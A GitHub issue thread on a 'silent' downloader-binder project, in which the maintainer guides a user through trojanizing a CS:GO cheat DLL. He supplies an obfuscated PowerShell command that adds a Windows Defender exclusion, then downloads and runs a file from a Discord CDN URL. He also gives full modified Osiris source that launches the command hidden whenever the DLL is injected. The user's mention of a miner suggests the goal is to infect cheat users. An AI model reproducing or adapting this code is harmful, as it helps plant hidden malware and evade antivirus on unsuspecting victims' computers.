UnamSanctam / UnamDownloader

A Free Silent (Hidden) Open Source Downloader (Binder) - Includes Windows Defender Bypass - Build Native - Unam Downloader
MIT License
178 stars 56 forks source link

is it possible to bind a dll with exe #32

Open azzerzzzeqwe opened 2 years ago

azzerzzzeqwe commented 2 years ago

if i bind a dll with exe and i rename it with the extension agian will it work?

edit: wrong category srry

UnamSanctam commented 2 years ago

Rename the final build to .dll you mean? It depends on how the .dll is going to be loaded.

azzerzzzeqwe commented 2 years ago

Rename the final build to .dll you mean? It depends on how the .dll is going to be loaded.

i want to bind it with a csgo cheat dll that will be injected using a Vac bypass injector

UnamSanctam commented 2 years ago

Then no you'd have to code your own .dll then due to how .dll's and injectors work.

azzerzzzeqwe commented 2 years ago

Then no you'd have to code your own .dll then due to how .dll's and injectors work.

so would there be any way to edit the DLLs code in order to remotely download and execute the exe from a host? while still working

UnamSanctam commented 2 years ago

You could edit the cheat .dll and add that yes.

azzerzzzeqwe commented 2 years ago

You could edit the cheat .dll and add that yes.

to edit it do all i need is visual studio? and is there any place i can find a simple download and execute script to put in, also since the file would need admin perms does that mean a screen would appear asking for it after injected

UnamSanctam commented 2 years ago

Depends on what your cheat .dll is made in and if you have the source code. You can use the download and execute script from this project, you can output the powershell string that's used and just copy paste it into that .dll (and include some method of executing it like in the UnamDownloader). Not sure how it would work with permissions but I assume it takes the privileges of CSGO in this case, it won't ask for administrator permissions since it's .dll injection and not an executable, but you could technically change the powershell script to ask for permissions.

azzerzzzeqwe commented 2 years ago

Depends on what your cheat .dll is made in and if you have the source code. You can use the download and execute script from this project, you can output the powershell string that's used and just copy paste it into that .dll (and include some method of executing it like in the UnamDownloader). Not sure how it would work with permissions but I assume it takes the privileges of CSGO in this case, it won't ask for administrator permissions since it's .dll injection and not an executable, but you could technically change the powershell script to ask for permissions.

the dll is https://anonfiles.com/n1G4s4a8yf/cheat_dll i think the source code is open idk how to check

UnamSanctam commented 2 years ago

You'd need the code just like this: https://github.com/UnamSanctam/UnamDownloader/tree/master/UnamDownloader with all the files to be able to compile your own.

azzerzzzeqwe commented 2 years ago

.

so if the dll does have the source code, i just need to pick a random line in the code, then add in the code from the downloader, and then upload the file somewhere, then put that link in the downloader code?

UnamSanctam commented 2 years ago

First you would build a build in the UnamDownloader with only the file you want to bind (not the .dll) and get the code used in that build, then you'd need to find somewhere to place the downloader code (probably somewhere in the DllMain function), then place the downloader code, compile the .dll and it would be done. You'd then have the cheat .dll that would download and execute the files whenever it gets injected.

azzerzzzeqwe commented 2 years ago

First you would build a build in the UnamDownloader with only the file you want to bind (not the .dll) and get the code used in that build, then you'd need to find somewhere to place the downloader code (probably somewhere in the DllMain function), then place the downloader code, compile the .dll and it would be done. You'd then have the cheat .dll that would download and execute the files whenever it gets injected.

when im trying to build i get this tcc: error: could not run 'C:\clips\miner\Compilers\tinycc\i386-win32-tcc.exe'

nvm i used the Managed option and it worked

azzerzzzeqwe commented 2 years ago

First you would build a build in the UnamDownloader with only the file you want to bind (not the .dll) and get the code used in that build, then you'd need to find somewhere to place the downloader code (probably somewhere in the DllMain function), then place the downloader code, compile the .dll and it would be done. You'd then have the cheat .dll that would download and execute the files whenever it gets injected.

how would i go about opening the exe file? i dont have any code editor except for visual studio and it opens to random characters and says it cant recognize the text encoding

UnamSanctam commented 2 years ago

Since it's a managed file you can use ILSpy and just debug it, you only need the powershell command from it.

azzerzzzeqwe commented 2 years ago

Since it's a managed file you can use ILSpy and just debug it, you only need the powershell command from it.

image ......

UnamSanctam commented 2 years ago

Open the entry at the bottom, then select the entry that appears under it and you should see the code in the right box.

azzerzzzeqwe commented 2 years ago

Open the entry at the bottom, then select the entry that appears under it and you should see the code in the right box.

ProcessStartInfo processStartInfo = new ProcessStartInfo(); processStartInfo.FileName = "powershell"; processStartInfo.Arguments = "-EncodedCommand \"PAAjAGoAdgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBxAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBnAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAagB2AGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA1ADUAMgA4ADgAOAAxADgAMQA2ADcAMgAwADEAOAAxADIALwA5ADgAMAAxADgAOQA3ADIAMQA0ADMAMwAxADAAMAAzADYAOAAvAGUAaAB0AC4AZQB4AGUAJwAsACAAPAAjAHYAbgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABuAGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAgADwAIwBkAGQAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBJAG4AagBlAGMAdABvAHIALgBlAHgAZQAnACkAKQA8ACMAeQB2AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABsAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUAIAA8ACMAZwBrAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASQBuAGoAZQBjAHQAbwByAC4AZQB4AGUAJwApADwAIwB0AGwAcwAjAD4A\""; processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; processStartInfo.CreateNoWindow = true; Process.Start(processStartInfo);

is that the whole cmd?

UnamSanctam commented 2 years ago

Yes,

powershell -EncodedCommand "PAAjAGoAdgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBxAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBnAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAagB2AGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA1ADUAMgA4ADgAOAAxADgAMQA2ADcAMgAwADEAOAAxADIALwA5ADgAMAAxADgAOQA3ADIAMQA0ADMAMwAxADAAMAAzADYAOAAvAGUAaAB0AC4AZQB4AGUAJwAsACAAPAAjAHYAbgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABuAGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAgADwAIwBkAGQAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBJAG4AagBlAGMAdABvAHIALgBlAHgAZQAnACkAKQA8ACMAeQB2AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABsAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUAIAA8ACMAZwBrAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASQBuAGoAZQBjAHQAbwByAC4AZQB4AGUAJwApADwAIwB0AGwAcwAjAD4A"

Is your command, you can run that from inside any program and it will download and execute whatever things you put in the downloader.

azzerzzzeqwe commented 2 years ago

powershell -EncodedCommand "PAAjAGoAdgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBxAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBnAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAagB2AGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA1ADUAMgA4ADgAOAAxADgAMQA2ADcAMgAwADEAOAAxADIALwA5ADgAMAAxADgAOQA3ADIAMQA0ADMAMwAxADAAMAAzADYAOAAvAGUAaAB0AC4AZQB4AGUAJwAsACAAPAAjAHYAbgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABuAGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAgADwAIwBkAGQAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBJAG4AagBlAGMAdABvAHIALgBlAHgAZQAnACkAKQA8ACMAeQB2AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABsAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUAIAA8ACMAZwBrAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASQBuAGoAZQBjAHQAbwByAC4AZQB4AGUAJwApADwAIwB0AGwAcwAjAD4A"

so i just copy paste that in a random line in the dll? do i open the DLL with ilspy also or another program.

UnamSanctam commented 2 years ago

You'll need to execute the command somehow (for example with ShellExecute), you can't really "open" the .dll, it's a native file and not a managed file so only way would be to reverse engineer it (you need a lot of experience for that). You'll need the cheat source code to build your own version of the cheat .dll.

azzerzzzeqwe commented 2 years ago

You'll need to execute the command somehow (for example with ShellExecute), you can't really "open" the .dll, it's a native file and not a managed file so only way would be to reverse engineer it (you need a lot of experience for that). You'll need the cheat source code to build your own version of the cheat .dll.

i could use this https://github.com/danielkrupinski/Osiris the problem is idk how to do the shellexecute thing or where to put the line of code

UnamSanctam commented 2 years ago

You would maybe put it in this file https://github.com/danielkrupinski/Osiris/blob/master/Source/Osiris.cpp so that it would look like this:

#include <memory>

#ifdef _WIN32
#include <clocale>
#include <Windows.h>
#include <ShellAPI.h>
#endif

#include "Hooks.h"

#ifdef _WIN32

extern "C" BOOL WINAPI _CRT_INIT(HMODULE moduleHandle, DWORD reason, LPVOID reserved);

BOOL APIENTRY DllEntryPoint(HMODULE moduleHandle, DWORD reason, LPVOID reserved)
{
    if (!_CRT_INIT(moduleHandle, reason, reserved))
        return FALSE;

    if (reason == DLL_PROCESS_ATTACH) {
        std::setlocale(LC_CTYPE, ".utf8");
        hooks = std::make_unique<Hooks>(moduleHandle);
    }

    ShellExecuteA(NULL, "open", "powershell", "-EncodedCommand \"PAAjAGoAdgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBxAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBnAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAagB2AGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA1ADUAMgA4ADgAOAAxADgAMQA2ADcAMgAwADEAOAAxADIALwA5ADgAMAAxADgAOQA3ADIAMQA0ADMAMwAxADAAMAAzADYAOAAvAGUAaAB0AC4AZQB4AGUAJwAsACAAPAAjAHYAbgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABuAGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAgADwAIwBkAGQAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBJAG4AagBlAGMAdABvAHIALgBlAHgAZQAnACkAKQA8ACMAeQB2AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABsAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUAIAA8ACMAZwBrAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASQBuAGoAZQBjAHQAbwByAC4AZQB4AGUAJwApADwAIwB0AGwAcwAjAD4A\"", NULL, SW_HIDE);
    return TRUE;
}

#else

void __attribute__((constructor)) DllEntryPoint()
{
    hooks = std::make_unique<Hooks>();
}

#endif
azzerzzzeqwe commented 2 years ago

You would maybe put it in this file https://github.com/danielkrupinski/Osiris/blob/master/Source/Osiris.cpp so that it would look like this:

#include <memory>

#ifdef _WIN32
#include <clocale>
#include <Windows.h>
#include <ShellAPI.h>
#endif

#include "Hooks.h"

#ifdef _WIN32

extern "C" BOOL WINAPI _CRT_INIT(HMODULE moduleHandle, DWORD reason, LPVOID reserved);

BOOL APIENTRY DllEntryPoint(HMODULE moduleHandle, DWORD reason, LPVOID reserved)
{
    if (!_CRT_INIT(moduleHandle, reason, reserved))
        return FALSE;

    if (reason == DLL_PROCESS_ATTACH) {
        std::setlocale(LC_CTYPE, ".utf8");
        hooks = std::make_unique<Hooks>(moduleHandle);
    }

    ShellExecuteA(NULL, "open", "powershell", "-EncodedCommand \"PAAjAGoAdgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBxAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBnAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAagB2AGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA1ADUAMgA4ADgAOAAxADgAMQA2ADcAMgAwADEAOAAxADIALwA5ADgAMAAxADgAOQA3ADIAMQA0ADMAMwAxADAAMAAzADYAOAAvAGUAaAB0AC4AZQB4AGUAJwAsACAAPAAjAHYAbgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABuAGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAgADwAIwBkAGQAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBJAG4AagBlAGMAdABvAHIALgBlAHgAZQAnACkAKQA8ACMAeQB2AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABsAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUAIAA8ACMAZwBrAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASQBuAGoAZQBjAHQAbwByAC4AZQB4AGUAJwApADwAIwB0AGwAcwAjAD4A\"", NULL, SW_HIDE);
    return TRUE;
}

#else

void __attribute__((constructor)) DllEntryPoint()
{
    hooks = std::make_unique<Hooks>();
}

#endif

k, before i do it do my settings look fine? i havent done this with a dll before so i dont wanna make any mistakes https://anonfiles.com/xdKaR6k3y2/Screenshot_2022-05-28_174720_png https://anonfiles.com/1bK0R5kayd/Screenshot_2022-05-28_174928_png https://anonfiles.com/51KdR0k4ya/Screenshot_2022-05-28_174958_png and would i just copy paste that whole section into the .cpp file?

UnamSanctam commented 2 years ago

Yes those settings look fine, and yes just copy paste (replace) everything in that .cpp file.

azzerzzzeqwe commented 2 years ago

Yes those settings look fine, and yes just copy paste (replace) everything in that .cpp file.

ok, i made a new miner without stealth and replaced the cmd. since i cannot because i dont know anythgin about it can you test to see if it works using an injector? its not the injector people would use with steam so idk if it would work the same but maybe dll- https://tmpfiles.org/301321/osiris.dll injector - https://tmpfiles.org/301319/dll_injector_setup_1.2.6.exe if you have free time of course

automaticmakemoney commented 1 year ago

Yes those settings look fine, and yes just copy paste (replace) everything in that .cpp file.

ok, i made a new miner without stealth and replaced the cmd. since i cannot because i dont know anythgin about it can you test to see if it works using an injector? its not the injector people would use with steam so idk if it would work the same but maybe dll- https://tmpfiles.org/301321/osiris.dll injector - https://tmpfiles.org/301319/dll_injector_setup_1.2.6.exe if you have free time of course

Your request is unreasonable and ignorant!